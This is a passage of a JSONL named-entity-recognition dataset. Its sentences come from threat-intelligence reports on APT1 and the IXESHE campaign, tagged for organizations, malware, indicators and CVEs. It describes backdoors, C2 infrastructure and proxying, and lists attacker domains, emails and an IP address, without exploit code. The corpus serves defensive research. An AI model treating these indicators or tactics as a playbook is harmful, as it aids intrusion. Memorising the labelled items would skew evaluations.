” Unit 61398 is partially situated on Datong Road in Gaoqiaozhen , which is located in the Pudong New Area of Shanghai .", "spans": {"Organization: Unit 61398": [[16, 26], [159, 169]]}, "info": {"id": "aptner_train_001973", "source": "aptner_train"}} {"text": "The central building in this compound is a 130,663 square foot facility that is 12 stories high and was built in early 2007 .", "spans": {}, "info": {"id": "aptner_train_001974", "source": "aptner_train"}} {"text": "APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations , and has demonstrated the capability and intent to steal from dozens of organizations simultaneously .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_001975", "source": "aptner_train"}} {"text": "Since 2006 , Mandiant has observed APT1 compromise 141 companies spanning 20 major industries .", "spans": {"Organization: Mandiant": [[13, 21]], "Organization: APT1": [[35, 39]]}, "info": {"id": "aptner_train_001976", "source": "aptner_train"}} {"text": "APT1 has a well-defined attack methodology , honed over years and designed to steal large volumes of valuable intellectual property .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_001977", "source": "aptner_train"}} {"text": "Once APT1 has established access , they periodically revisit the victim ’s network over several months or years and steal broad categories of intellectual property , including technology blueprints , proprietary manufacturing processes , test results , business plans , pricing documents , partnership agreements , and emails and contact lists from victim organizations ’ leadership .", "spans": {"Organization: APT1": [[5, 9]], "System: emails": [[319, 325]]}, "info": {"id": "aptner_train_001978", "source": "aptner_train"}} {"text": "APT1 uses some tools and techniques that we have not yet observed being used by other groups including two utilities designed to steal email — GETMAIL and 
MAPIGET .", "spans": {"Organization: APT1": [[0, 4]], "System: email": [[135, 140]], "Malware: GETMAIL": [[143, 150]], "Malware: MAPIGET": [[155, 162]]}, "info": {"id": "aptner_train_001979", "source": "aptner_train"}} {"text": "Establishing a foothold involves actions that ensure control of the target network ’s systems from outside the network .", "spans": {}, "info": {"id": "aptner_train_001980", "source": "aptner_train"}} {"text": "APT1 establishes a foothold once email recipients open a malicious file and a backdoor is subsequently installed .", "spans": {"Organization: APT1": [[0, 4]], "System: email": [[33, 38]]}, "info": {"id": "aptner_train_001981", "source": "aptner_train"}} {"text": "A backdoor is software that allows an intruder to send commands to the system remotely .", "spans": {}, "info": {"id": "aptner_train_001982", "source": "aptner_train"}} {"text": "In almost every case , APT backdoors initiate outbound connections to the intruder ’s “ command and control ” ( C2 ) server .", "spans": {"System: C2": [[112, 114]]}, "info": {"id": "aptner_train_001983", "source": "aptner_train"}} {"text": "APT intruders employ this tactic because while network firewalls are generally adept at keeping malware outside the network from initiating communication with systems inside the network , they are less reliable at keeping malware that is already inside the network from communicating to systems outside .", "spans": {}, "info": {"id": "aptner_train_001984", "source": "aptner_train"}} {"text": "We will describe APT1 ’s backdoors in two categories : “ Beachhead Backdoors ” and “ Standard Backdoors. 
”", "spans": {"Organization: APT1": [[17, 21]]}, "info": {"id": "aptner_train_001986", "source": "aptner_train"}} {"text": "Beachhead backdoors are typically minimally featured .", "spans": {}, "info": {"id": "aptner_train_001987", "source": "aptner_train"}} {"text": "They offer the attacker a toe-hold to perform simple tasks like retrieve files , gather basic system information and trigger the execution of other more significant capabilities such as a standard backdoor .", "spans": {}, "info": {"id": "aptner_train_001988", "source": "aptner_train"}} {"text": "APT1 ’s beachhead backdoors are usually what we call WEBC2 backdoors .", "spans": {"Organization: APT1": [[0, 4]], "Malware: WEBC2 backdoors": [[53, 68]]}, "info": {"id": "aptner_train_001989", "source": "aptner_train"}} {"text": "WEBC2 backdoors are probably the most well-known kind of APT1 backdoor , and are the reason why some security companies refer to APT1 as the “ Comment Crew. ” A WEBC2 backdoor is designed to retrieve a webpage from a C2 server .", "spans": {"Malware: WEBC2 backdoors": [[0, 15]], "Organization: APT1": [[57, 61], [129, 133]], "Malware: WEBC2 backdoor": [[161, 175]], "System: C2": [[217, 219]]}, "info": {"id": "aptner_train_001990", "source": "aptner_train"}} {"text": "It expects the webpage to contain special HTML tags ; the backdoor will attempt to interpret the data between the tags as commands .", "spans": {"System: HTML": [[42, 46]]}, "info": {"id": "aptner_train_001991", "source": "aptner_train"}} {"text": "Older versions of WEBC2 read data between HTML comments , though over time WEBC2 variants have evolved to read data contained within other types of tags .", "spans": {"Malware: WEBC2": [[18, 23], [75, 80]], "System: HTML": [[42, 46]]}, "info": {"id": "aptner_train_001992", "source": "aptner_train"}} {"text": "From direct observation , we can confirm that APT1 was using WEBC2 backdoors as early as July 2006 .", "spans": {"Organization: APT1": [[46, 50]], "Malware: WEBC2 
backdoors": [[61, 76]]}, "info": {"id": "aptner_train_001993", "source": "aptner_train"}} {"text": "However , the first compile time35 we have for WEBC2 is 2004-01-23 , suggesting that APT1 has been crafting WEBC2 backdoors since early 2004 .", "spans": {"Malware: WEBC2": [[47, 52]], "Organization: APT1": [[85, 89]], "Malware: WEBC2 backdoors": [[108, 123]]}, "info": {"id": "aptner_train_001994", "source": "aptner_train"}} {"text": "Based on the 400+ samples of WEBC2 variants that we have accumulated , it appears that APT1 has direct access to developers who have continually released new WEBC2 variants for over six years .", "spans": {"Malware: WEBC2": [[29, 34], [158, 163]], "Organization: APT1": [[87, 91]]}, "info": {"id": "aptner_train_001995", "source": "aptner_train"}} {"text": "WEBC2 backdoors are often packaged with spear phishing emails .", "spans": {"Malware: WEBC2 backdoors": [[0, 15]], "System: emails": [[55, 61]]}, "info": {"id": "aptner_train_001996", "source": "aptner_train"}} {"text": "Once installed , APT1 intruders have the option to tell victim systems to download and execute additional malicious software of their choice .", "spans": {"Organization: APT1": [[17, 21]]}, "info": {"id": "aptner_train_001997", "source": "aptner_train"}} {"text": "WEBC2 backdoors work for their intended purpose , but they generally have fewer features than the “ Standard Backdoors ” described below .", "spans": {"Malware: WEBC2 backdoors": [[0, 15]]}, "info": {"id": "aptner_train_001998", "source": "aptner_train"}} {"text": "The standard , non-WEBC2 APT1 backdoor typically communicates using the HTTP protocol ( to blend in with legitimate web traffic ) or a custom protocol that the malware authors designed themselves .", "spans": {"Malware: non-WEBC2": [[15, 24]], "Organization: APT1": [[25, 29]]}, "info": {"id": "aptner_train_001999", "source": "aptner_train"}} {"text": "These backdoors give APT intruders a laundry list of ways to control victim systems .", "spans": 
{}, "info": {"id": "aptner_train_002000", "source": "aptner_train"}} {"text": "The BISCUIT backdoor ( so named for the command “ bdkzt ” ) is an illustrative example of the range of commands that APT1 has built into its “ standard ” backdoors .", "spans": {"Malware: BISCUIT backdoor": [[4, 20]], "Malware: bdkzt": [[50, 55]], "Organization: APT1": [[117, 121]]}, "info": {"id": "aptner_train_002001", "source": "aptner_train"}} {"text": "Some APT backdoors attempt to mimic legitimate Internet traffic other than the HTTP protocol .", "spans": {}, "info": {"id": "aptner_train_002003", "source": "aptner_train"}} {"text": "When network defenders see the communications between these backdoors and their C2 servers , they might easily dismiss them as legitimate network traffic .", "spans": {"System: C2": [[80, 82]]}, "info": {"id": "aptner_train_002004", "source": "aptner_train"}} {"text": "APT1 .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_002005", "source": "aptner_train"}} {"text": "APT1 maintains an extensive infrastructure of computers around the world .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_002006", "source": "aptner_train"}} {"text": "We have evidence suggesting that APT1 manually controls thousands of systems in support of their attacks , and have directly observed their control over hundreds of these systems .", "spans": {"Organization: APT1": [[33, 37]]}, "info": {"id": "aptner_train_002007", "source": "aptner_train"}} {"text": "Although they control systems in dozens of countries , their attacks originate from four large networks in Shanghai — two of which are allocated directly to the Pudong New Area , the home of Unit 61398 .", "spans": {"Organization: Unit 61398": [[191, 201]]}, "info": {"id": "aptner_train_002008", "source": "aptner_train"}} {"text": "The sheer number of APT1 IP addresses concentrated in these Shanghai ranges , coupled with Simplified Chinese keyboard layout settings on APT1 ’s 
attack systems , betrays the true location and language of the operators .", "spans": {"Organization: APT1": [[20, 24], [138, 142]], "System: Simplified Chinese keyboard": [[91, 118]]}, "info": {"id": "aptner_train_002009", "source": "aptner_train"}} {"text": "To help manage the vast number of systems they control , APT1 has registered hundreds of domain names , the majority of which also point to a Shanghai locale .", "spans": {"Organization: APT1": [[57, 61]]}, "info": {"id": "aptner_train_002010", "source": "aptner_train"}} {"text": "The domain names and IP addresses together comprise APT1 ’s command and control framework which they manage in concert to camouflage their true origin from their English speaking targets .", "spans": {"Organization: APT1": [[52, 56]], "System: command and control": [[60, 79]]}, "info": {"id": "aptner_train_002011", "source": "aptner_train"}} {"text": "As covered in the previous “ Attack Lifecycle ” section , WEBC2 backdoor variants download and interpret data stored between tags in HTML pages as commands .", "spans": {"Malware: WEBC2 backdoor": [[58, 72]], "System: HTML": [[133, 137]]}, "info": {"id": "aptner_train_002012", "source": "aptner_train"}} {"text": "They usually download HTML pages from a system within APT1 ’s hop infrastructure .", "spans": {"System: HTML": [[22, 26]], "Organization: APT1": [[54, 58]]}, "info": {"id": "aptner_train_002013", "source": "aptner_train"}} {"text": "We have observed APT1 intruders logging in to WEBC2 servers and manually editing the HTML pages that backdoors will download .", "spans": {"Organization: APT1": [[17, 21]], "Malware: WEBC2": [[46, 51]], "System: HTML": [[85, 89]]}, "info": {"id": "aptner_train_002014", "source": "aptner_train"}} {"text": "Because the commands are usually encoded and difficult to spell from memory , APT1 intruders typically do not type these strings , but instead copy and paste them into the HTML files .", "spans": {"Organization: APT1": [[78, 82]], "System: HTML": 
[[172, 176]]}, "info": {"id": "aptner_train_002015", "source": "aptner_train"}} {"text": "They likely generate the encoded commands on their own systems before pasting them in to an HTML file hosted by the hop point .", "spans": {"System: HTML": [[92, 96]]}, "info": {"id": "aptner_train_002016", "source": "aptner_train"}} {"text": "For example , we observed an APT attacker pasting the string “ czo1NA== ” into an HTML page .", "spans": {"System: HTML": [[82, 86]]}, "info": {"id": "aptner_train_002017", "source": "aptner_train"}} {"text": "That string is the base64 encoded version of “ s : 54 ” , meaning “ sleep for 54 minutes ” ( or hours , depending on the particular backdoor ) .", "spans": {}, "info": {"id": "aptner_train_002018", "source": "aptner_train"}} {"text": "In lieu of manually editing an HTML file on a hop point , we have also observed APT1 intruders uploading new ( already-edited ) HTML files .", "spans": {"System: HTML": [[31, 35], [128, 132]], "Organization: APT1": [[80, 84]]}, "info": {"id": "aptner_train_002019", "source": "aptner_train"}} {"text": "When APT1 attackers are not using WEBC2 , they require a “ command and control ” ( C2 ) user interface so they can issue commands to the backdoor .", "spans": {"Organization: APT1": [[5, 9]], "Malware: WEBC2": [[34, 39]], "System: command and control": [[59, 78]], "System: C2": [[83, 85]]}, "info": {"id": "aptner_train_002020", "source": "aptner_train"}} {"text": "This interface sometimes runs on their personal attack system , which is typically in Shanghai .", "spans": {}, "info": {"id": "aptner_train_002021", "source": "aptner_train"}} {"text": "In these instances , when a victim backdoor makes contact with a hop , the communications need to be forwarded from the hop to the intruder ’s Shanghai system so the backdoor can talk to the C2 server software .", "spans": {"System: C2": [[191, 193]]}, "info": {"id": "aptner_train_002022", "source": "aptner_train"}} {"text": "We have observed 767 separate 
instances in which APT1 intruders used the publicly available “ HUC Packet Transmit Tool ” or HTRAN on a hop .", "spans": {"Organization: APT1": [[49, 53]], "System: HUC Packet Transmit Tool": [[94, 118]], "System: HTRAN": [[124, 129]]}, "info": {"id": "aptner_train_002023", "source": "aptner_train"}} {"text": "As always , keep in mind that these uses are confirmed uses , and likely represent only a small fraction of APT1 ’s total activity .", "spans": {"Organization: APT1": [[108, 112]]}, "info": {"id": "aptner_train_002024", "source": "aptner_train"}} {"text": "The HTRAN utility is merely a middle-man , facilitating connections between the victim and the attacker who is using the hop point .", "spans": {"System: HTRAN": [[4, 9]]}, "info": {"id": "aptner_train_002025", "source": "aptner_train"}} {"text": "Typical use of HTRAN is fairly simple : the attacker must specify the originating IP address ( of his or her workstation in Shanghai ) , and a port on which to accept connections .", "spans": {"System: HTRAN": [[15, 20]]}, "info": {"id": "aptner_train_002026", "source": "aptner_train"}} {"text": "For example , the following command , which was issued by an APT1 actor , will listen for incoming connections on port 443 on the hop and automatically proxy them to the Shanghai IP address 58.247.242.254 on port 443 .", "spans": {"Organization: APT1": [[61, 65]], "Indicator: 58.247.242.254": [[190, 204]]}, "info": {"id": "aptner_train_002027", "source": "aptner_train"}} {"text": "Occasionally , APT1 attackers have installed C2 server components on systems in their hop infrastructure rather than forwarding connections back to C2 servers in Shanghai .", "spans": {"Organization: APT1": [[15, 19]], "System: C2": [[45, 47], [148, 150]]}, "info": {"id": "aptner_train_002028", "source": "aptner_train"}} {"text": "In these instances they do not need to use a proxy tool like HTRAN to interact with victim systems .", "spans": {"System: HTRAN": [[61, 66]]}, "info": {"id": 
"aptner_train_002029", "source": "aptner_train"}} {"text": "However , it does mean that the intruders need to be able to interface with the ( often graphical ) C2 server software running on the hop .", "spans": {"System: C2": [[100, 102]]}, "info": {"id": "aptner_train_002030", "source": "aptner_train"}} {"text": "We have observed APT1 intruders log in to their hop point , start the C2 server , wait for incoming connections , and then proceed to give commands to victim systems .", "spans": {"Organization: APT1": [[17, 21]], "System: C2": [[70, 72]]}, "info": {"id": "aptner_train_002031", "source": "aptner_train"}} {"text": "WEBC2 variants may include a server component that provides a simple C2 interface to the intruder .", "spans": {"Malware: WEBC2": [[0, 5]], "System: C2": [[69, 71]]}, "info": {"id": "aptner_train_002032", "source": "aptner_train"}} {"text": "This saves the intruder from having to manually edit webpages .", "spans": {}, "info": {"id": "aptner_train_002033", "source": "aptner_train"}} {"text": "That is , this server component receives connections from victim backdoors , displays them to the intruder , and then translates the intruder ’s commands into HTML tags that the victim backdoors read .", "spans": {"System: HTML": [[159, 163]]}, "info": {"id": "aptner_train_002034", "source": "aptner_train"}} {"text": "In the last two years alone , we have confirmed 937 APT1 C2 servers — that is , actively listening or communicating programs — running on 849 distinct IP addresses .", "spans": {"Organization: APT1": [[52, 56]], "System: C2": [[57, 59]]}, "info": {"id": "aptner_train_002035", "source": "aptner_train"}} {"text": "However , we have evidence to suggest that APT1 is running hundreds , and likely thousands , of other servers ( see the Domains section below ) .", "spans": {"Organization: APT1": [[43, 47]]}, "info": {"id": "aptner_train_002036", "source": "aptner_train"}} {"text": "The programs acting as APT1 servers have mainly been : FTP , for 
transferring files ; web , primarily for WEBC2 ; RDP , for remote graphical control of a system ; HTRAN , for proxying ; and C2 servers associated with various backdoor families .", "spans": {"Organization: APT1": [[23, 27]], "Malware: WEBC2": [[106, 111]], "System: HTRAN": [[163, 168]], "System: C2": [[190, 192]]}, "info": {"id": "aptner_train_002037", "source": "aptner_train"}} {"text": "The Domain Name System ( DNS ) is the phone book of the Internet .", "spans": {}, "info": {"id": "aptner_train_002038", "source": "aptner_train"}} {"text": "In the same way that people program named contacts into their cell phones and no longer need to remember phone numbers , DNS allows people to remember names like “ google.com ” instead of IP addresses .", "spans": {"Indicator: google.com": [[164, 174]]}, "info": {"id": "aptner_train_002039", "source": "aptner_train"}} {"text": "When a person types “ google.com ” into a web browser , a DNS translation to an IP address occurs so that the person ’s computer can communicate with Google .", "spans": {"Indicator: google.com": [[22, 32]], "Organization: Google": [[150, 156]]}, "info": {"id": "aptner_train_002040", "source": "aptner_train"}} {"text": "Names that can be translated through DNS to IP addresses are referred to as Fully Qualified Domain Names ( FQDNs ) .", "spans": {"System: Fully Qualified Domain Names": [[76, 104]], "System: FQDNs": [[107, 112]]}, "info": {"id": "aptner_train_002041", "source": "aptner_train"}} {"text": "A DNS zone represents a collection of FQDNs that end with the same name , and which are usually registered through a domain registration company and controlled by a single owner .", "spans": {"System: FQDNs": [[38, 43]]}, "info": {"id": "aptner_train_002042", "source": "aptner_train"}} {"text": "For example , “ hugesoft.org ” is an FQDN but also represents a zone .", "spans": {"Indicator: hugesoft.org": [[16, 28]], "System: FQDN": [[37, 41]]}, "info": {"id": "aptner_train_002043", "source": 
"aptner_train"}} {"text": "The FQDNs “ ug-co.hugesoft.org ” and “ 7cback.hugesoft.org ” are part of the “ hugesoft.org ” zone and are called “ subdomains ” of the zone .", "spans": {"System: FQDNs": [[4, 9]], "Indicator: ug-co.hugesoft.org": [[12, 30]], "Indicator: 7cback.hugesoft.org": [[39, 58]], "Indicator: hugesoft.org": [[79, 91]]}, "info": {"id": "aptner_train_002044", "source": "aptner_train"}} {"text": "The person who registered “ hugesoft.org ” may add as many subdomains as they wish and controls the IP resolutions of these FQDNs .", "spans": {"Indicator: hugesoft.org": [[28, 40]], "System: FQDNs": [[124, 129]]}, "info": {"id": "aptner_train_002045", "source": "aptner_train"}} {"text": "APT1 has registered at least 107 zones since 2004 .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_002046", "source": "aptner_train"}} {"text": "Within these zones , we know of thousands of FQDNs that have resolved to hundreds of IP addresses ( which we suspect are hops ) and in some instances to APT1 ’s source IP addresses in Shanghai .", "spans": {"System: FQDNs": [[45, 50]], "Organization: APT1": [[153, 157]]}, "info": {"id": "aptner_train_002047", "source": "aptner_train"}} {"text": "The first zone we became aware of was “ hugesoft.org ” , which was registered through eNom , Inc. 
in October 2004 .", "spans": {"Indicator: hugesoft.org": [[40, 52]]}, "info": {"id": "aptner_train_002048", "source": "aptner_train"}} {"text": "The registrant supplied “ uglygorilla@163.com ” as an email address .", "spans": {"Indicator: uglygorilla@163.com": [[26, 45]], "System: email": [[54, 59]]}, "info": {"id": "aptner_train_002049", "source": "aptner_train"}} {"text": "The supplied registration information , which is still visible in public “ whois ” data as of February 3, 2013 .", "spans": {"System: whois": [[75, 80]]}, "info": {"id": "aptner_train_002050", "source": "aptner_train"}} {"text": "The supplied registrant information does not need to be accurate for the zone to be registered successfully .", "spans": {}, "info": {"id": "aptner_train_002051", "source": "aptner_train"}} {"text": "For example , “ shanghai ” is not a street name .", "spans": {}, "info": {"id": "aptner_train_002052", "source": "aptner_train"}} {"text": "Nevertheless , it is noteworthy that Shanghai appeared in the first known APT1 domain registration , along with a phone number that begins with China ’s “ +86 ” international code .", "spans": {"Organization: APT1": [[74, 78]]}, "info": {"id": "aptner_train_002053", "source": "aptner_train"}} {"text": "In fact , Shanghai was listed as the registrant ’s city in at least 24 of the 107 ( 22% ) registrations .", "spans": {}, "info": {"id": "aptner_train_002054", "source": "aptner_train"}} {"text": "Overall , the combination of a relatively high number of “ Shanghai ” registrations with obviously false registration examples in other registrations suggests a partially uncoordinated domain registration campaign from 2004 until present , in which some registrants tried to fabricate non-Shanghai locations but others did not .", "spans": {}, "info": {"id": "aptner_train_002055", "source": "aptner_train"}} {"text": "This is supported by contextual information on the Internet for the email address “ lfengg@163.com , ” which was supplied in the 
registration information for seven of the 107 zones .", "spans": {"System: email": [[68, 73]], "Indicator: lfengg@163.com": [[84, 98]]}, "info": {"id": "aptner_train_002056", "source": "aptner_train"}} {"text": "On the site “ www.china-one.org , ” the email address “ lfengg@163.com ” appears as the contact for the Shanghai Kai Optical Information Technology Co. , Ltd. , a website production company located in a part of Shanghai that is across the river from PLA Unit 61398 .", "spans": {"Indicator: www.china-one.org": [[14, 31]], "System: email": [[40, 45]], "Indicator: lfengg@163.com": [[56, 70]], "Organization: Kai Optical Information Technology": [[113, 147]], "Organization: PLA": [[250, 253]], "Organization: Unit 61398": [[254, 264]]}, "info": {"id": "aptner_train_002057", "source": "aptner_train"}} {"text": "About half of APT1 ’s known zones were named according to three themes : news , technology and business .", "spans": {"Organization: APT1": [[14, 18]]}, "info": {"id": "aptner_train_002058", "source": "aptner_train"}} {"text": "These themes cause APT1 command and control addresses to appear benign at first glance .", "spans": {"Organization: APT1": [[19, 23]]}, "info": {"id": "aptner_train_002059", "source": "aptner_train"}} {"text": "However , we believe that the hundreds of FQDNs within these zones were created for the purpose of APT1 intrusions . ( Note : these themes are not unique to APT1 or even APT in general . 
) The news-themed zones include the names of well-known news media outlets such as CNN , Yahoo and Reuters .", "spans": {"System: FQDNs": [[42, 47]], "Organization: APT1": [[99, 103], [157, 161]], "Organization: CNN": [[270, 273]], "Organization: Yahoo": [[276, 281]], "Organization: Reuters": [[286, 293]]}, "info": {"id": "aptner_train_002060", "source": "aptner_train"}} {"text": "However , they also include names referencing English-speaking countries , such as “ aunewsonline.com ” ( Australia ) , “ canadatvsite.com ” ( Canada ) , and “ todayusa.org ” ( U.S . ) .", "spans": {"Indicator: aunewsonline.com": [[85, 101]], "Indicator: canadatvsite.com": [[122, 138]], "Indicator: todayusa.org": [[160, 172]]}, "info": {"id": "aptner_train_002061", "source": "aptner_train"}} {"text": "Below is a list of zones registered by APT1 that are newsthemed :", "spans": {"Organization: APT1": [[39, 43]]}, "info": {"id": "aptner_train_002062", "source": "aptner_train"}} {"text": "aoldaily.com aunewsonline.com canadatvsite.com canoedaily.com cnndaily.com cnndaily.net cnnnewsdaily.com defenceonline.net freshreaders.net giftnews.org reutersnewsonline.com rssadvanced.org saltlakenews.org sportreadok.net todayusa.org usapappers.com usnewssite.com yahoodaily.com .", "spans": {"Indicator: aoldaily.com": [[0, 12]], "Indicator: aunewsonline.com": [[13, 29]], "Indicator: canadatvsite.com": [[30, 46]], "Indicator: canoedaily.com": [[47, 61]], "Indicator: cnndaily.com": [[62, 74]], "Indicator: cnndaily.net": [[75, 87]], "Indicator: cnnnewsdaily.com": [[88, 104]], "Indicator: defenceonline.net": [[105, 122]], "Indicator: freshreaders.net": [[123, 139]], "Indicator: giftnews.org": [[140, 152]], "Indicator: reutersnewsonline.com": [[153, 174]], "Indicator: rssadvanced.org": [[175, 190]], "Indicator: saltlakenews.org": [[191, 207]], "Indicator: sportreadok.net": [[208, 223]], "Indicator: todayusa.org": [[224, 236]], "Indicator: usapappers.com": [[237, 251]], "Indicator: usnewssite.com": [[252, 
266]], "Indicator: yahoodaily.com": [[267, 281]]}, "info": {"id": "aptner_train_002063", "source": "aptner_train"}} {"text": "The technology-themed zones reference well-known technology companies ( AOL , Apple , Google , Microsoft ) , antivirus vendors ( McAfee , Symantec ) , and products ( Blackberry , Bluecoat ) .", "spans": {"Organization: AOL": [[72, 75]], "Organization: Apple": [[78, 83]], "Organization: Google": [[86, 92]], "Organization: Microsoft": [[95, 104]], "Organization: McAfee": [[129, 135]], "Organization: Symantec": [[138, 146]], "Organization: Blackberry": [[166, 176]], "Organization: Bluecoat": [[179, 187]]}, "info": {"id": "aptner_train_002064", "source": "aptner_train"}} {"text": "APT1 also used more generic names referencing topics like software :", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_002065", "source": "aptner_train"}} {"text": "globalowa.com gmailboxes.com hugesoft.org idirectech.com ifexcel.com infosupports.com livemymsn.com mcafeepaying.com microsoft-update-info.com micyuisyahooapis.com msnhome.org pcclubddk.net progammerli.com softsolutionbox.net symanteconline.net webservicesupdate.com .", "spans": {"Indicator: globalowa.com": [[0, 13]], "Indicator: gmailboxes.com": [[14, 28]], "Indicator: hugesoft.org": [[29, 41]], "Indicator: idirectech.com": [[42, 56]], "Indicator: ifexcel.com": [[57, 68]], "Indicator: infosupports.com": [[69, 85]], "Indicator: livemymsn.com": [[86, 99]], "Indicator: mcafeepaying.com": [[100, 116]], "Indicator: microsoft-update-info.com": [[117, 142]], "Indicator: micyuisyahooapis.com": [[143, 163]], "Indicator: msnhome.org": [[164, 175]], "Indicator: pcclubddk.net": [[176, 189]], "Indicator: progammerli.com": [[190, 205]], "Indicator: softsolutionbox.net": [[206, 225]], "Indicator: symanteconline.net": [[226, 244]], "Indicator: webservicesupdate.com": [[245, 266]]}, "info": {"id": "aptner_train_002066", "source": "aptner_train"}} {"text": "Finally , some zones used by APT1 reflect a 
business theme .", "spans": {"Organization: APT1": [[29, 33]]}, "info": {"id": "aptner_train_002067", "source": "aptner_train"}} {"text": "The names suggest websites that professionals might visit :", "spans": {}, "info": {"id": "aptner_train_002068", "source": "aptner_train"}} {"text": "advanbusiness.com businessconsults.net businessformars.com companyinfosite.com conferencesinfo.com copporationnews.com .", "spans": {"Indicator: advanbusiness.com": [[0, 17]], "Indicator: businessconsults.net": [[18, 38]], "Indicator: businessformars.com": [[39, 58]], "Indicator: companyinfosite.com": [[59, 78]], "Indicator: conferencesinfo.com": [[79, 98]], "Indicator: copporationnews.com": [[99, 118]]}, "info": {"id": "aptner_train_002069", "source": "aptner_train"}} {"text": "APT1 intruders often use the FQDNs that are associated with legitimate websites hosted by their hop points .", "spans": {"Organization: APT1": [[0, 4]], "System: FQDNs": [[29, 34]]}, "info": {"id": "aptner_train_002070", "source": "aptner_train"}} {"text": "We consider these domains to be “ hijacked ” because they were registered by someone for a legitimate reason , but have been leveraged by APT1 for malicious purposes .", "spans": {"Organization: APT1": [[138, 142]]}, "info": {"id": "aptner_train_002071", "source": "aptner_train"}} {"text": "APT1 uses hijacked FQDNs for two main purposes .", "spans": {"Organization: APT1": [[0, 4]], "System: FQDNs": [[19, 24]]}, "info": {"id": "aptner_train_002072", "source": "aptner_train"}} {"text": "First , they place malware ( usually in ZIP files ) on the legitimate websites hosted on the hop point and then send spear phishing emails with a link that includes the legitimate FQDN .", "spans": {"System: ZIP": [[40, 43]], "System: emails": [[132, 138]], "System: FQDN": [[180, 184]]}, "info": {"id": "aptner_train_002073", "source": "aptner_train"}} {"text": "APT12 .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002074", "source": 
"aptner_train"}} {"text": "This research paper will delve into another prominent group of attackers referred to as “ IXESHE ” ( pronounced “ i-sushi ” ) , based on one of the more common detection names security companies use for the malware they utilize .", "spans": {"Organization: IXESHE": [[90, 96]]}, "info": {"id": "aptner_train_002075", "source": "aptner_train"}} {"text": "This campaign is notable for targeting East Asian governments , electronics manufacturers , and a telecommunications company .", "spans": {}, "info": {"id": "aptner_train_002076", "source": "aptner_train"}} {"text": "The IXESHE campaign makes use of targeted emails with malicious attachments to compromise victims ’ systems .", "spans": {"Organization: IXESHE": [[4, 10]], "System: emails": [[42, 48]]}, "info": {"id": "aptner_train_002077", "source": "aptner_train"}} {"text": "The emails are often tailored for specific victims and contain malicious attachments that are almost always “ weaponized ” .PDF files with known exploits that drop malware executables onto targeted systems .", "spans": {"System: emails": [[4, 10]], "Indicator: .PDF": [[123, 127]]}, "info": {"id": "aptner_train_002078", "source": "aptner_train"}} {"text": "In addition , the IXESHE attackers conducted two specific attacks that leveraged zero-day exploits—one in 2009 and another in 2011 .", "spans": {"Organization: IXESHE": [[18, 24]], "Vulnerability: zero-day": [[81, 89]]}, "info": {"id": "aptner_train_002079", "source": "aptner_train"}} {"text": "The IXESHE attackers almost always make use of compromised servers as command-and-control ( C&C ) servers .", "spans": {"Organization: IXESHE": [[4, 10]], "System: command-and-control": [[70, 89]], "System: C&C": [[92, 95]]}, "info": {"id": "aptner_train_002080", "source": "aptner_train"}} {"text": "In some cases , the compromised servers are hosted on target organizations ’ networks after successful infiltration so the attackers can increase their control of the victims ’ 
infrastructure .", "spans": {}, "info": {"id": "aptner_train_002081", "source": "aptner_train"}} {"text": "Using this approach , the attackers amassed at least 60 C&C servers over time .", "spans": {"System: C&C": [[56, 59]]}, "info": {"id": "aptner_train_002082", "source": "aptner_train"}} {"text": "This technique also allows the attackers to cover their tracks , as having the C&C server in the victims ’ corporate networks means very little C&C traffic leaves them .", "spans": {"System: C&C": [[79, 82], [144, 147]]}, "info": {"id": "aptner_train_002083", "source": "aptner_train"}} {"text": "The attackers ’ deliberate use of compromised machines and dynamic Domain Name System ( DNS ) services allows them to hide traces of their presence by confusing their activities with data belonging to legitimate individuals .", "spans": {}, "info": {"id": "aptner_train_002084", "source": "aptner_train"}} {"text": "Looking at threat intelligence derived from tracking APT campaigns over time primarily based on the network traffic generated by the malware used , we were able to develop indicators of compromise for the IXESHE campaign .", "spans": {"Organization: IXESHE": [[205, 211]]}, "info": {"id": "aptner_train_002085", "source": "aptner_train"}} {"text": "The malware samples used in this campaign were not very complicated by nature but do give the attackers almost complete control over their targets ’ compromised systems .", "spans": {}, "info": {"id": "aptner_train_002086", "source": "aptner_train"}} {"text": "Most of the IP addresses of IXESHE ’s victims are linked to DSL networks , which made it difficult to determine their identities .", "spans": {"Organization: IXESHE": [[28, 34]], "System: DSL": [[60, 63]]}, "info": {"id": "aptner_train_002087", "source": "aptner_train"}} {"text": "Careful research , however , allowed the identification of some of the attackers ’ victims : East Asian governments , Taiwanese electronics manufacturers , A telecommunications company .", 
"spans": {}, "info": {"id": "aptner_train_002088", "source": "aptner_train"}} {"text": "Campaign victims were identified by using Whois records and open source research .", "spans": {"System: Whois": [[42, 47]]}, "info": {"id": "aptner_train_002089", "source": "aptner_train"}} {"text": "Trend Micro generally notifies customers that are believed to have been specifically targeted by APT campaigns .", "spans": {"Organization: Trend Micro": [[0, 11]]}, "info": {"id": "aptner_train_002090", "source": "aptner_train"}} {"text": "The IXESHE attackers have been actively launching highly targeted attacks since at least July 2009 .", "spans": {"Organization: IXESHE": [[4, 10]]}, "info": {"id": "aptner_train_002091", "source": "aptner_train"}} {"text": "Available data on the IXESHE campaign indicates that targeted emails with malicious .PDF file attachments were the attackers ’ vector of choice .", "spans": {"Organization: IXESHE": [[22, 28]], "System: emails": [[62, 68]], "Indicator: .PDF": [[84, 88]]}, "info": {"id": "aptner_train_002092", "source": "aptner_train"}} {"text": "In most cases , the attacks involved Adobe Acrobat , Reader , and Flash Player exploits such as : CVE-2009-4324 , CVE-2009-0927 , CVE-2011-0609 , CVE-2011-0611 .", "spans": {"System: Adobe Acrobat": [[37, 50]], "System: Reader": [[53, 59]], "System: Flash Player": [[66, 78]], "Vulnerability: CVE-2009-4324": [[98, 111]], "Vulnerability: CVE-2009-0927": [[114, 127]], "Vulnerability: CVE-2011-0609": [[130, 143]], "Vulnerability: CVE-2011-0611": [[146, 159]]}, "info": {"id": "aptner_train_002093", "source": "aptner_train"}} {"text": "It should also be noted that this campaign used CVE-2009-4324 and CVE-2011-0609 exploits when these were still unpatched or considered 